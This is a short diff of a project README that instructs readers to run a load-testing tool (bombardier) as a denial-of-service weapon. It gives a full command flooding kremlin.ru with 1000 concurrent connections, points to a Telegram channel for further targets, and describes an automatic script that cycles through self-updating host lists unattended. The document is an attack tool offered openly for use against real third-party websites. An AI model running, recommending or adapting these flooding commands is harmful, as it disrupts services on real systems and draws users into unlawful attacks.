v1adko/javelin/README.md

 - `docker run -it alpine/bombardier -c 1000 -d 60s -l https://kremlin.ru`
 - Last part of the comand is host url, you should pick one [from the last chat messages](https://t.me/itarmyofukraine2022)

-Automatic script performs the same command and loops through a list of hosts, so you can leave it unsupervised overnight or for long periods of time
+Automatic script performs the same command and loops through a list of hosts, so you can leave it unsupervised overnight or for long periods of time.
+It also automatically fetches updates to the list.

 ### Get the code
 - Clone the repo - `git clone https://github.com/v1adko/fuckputin.git`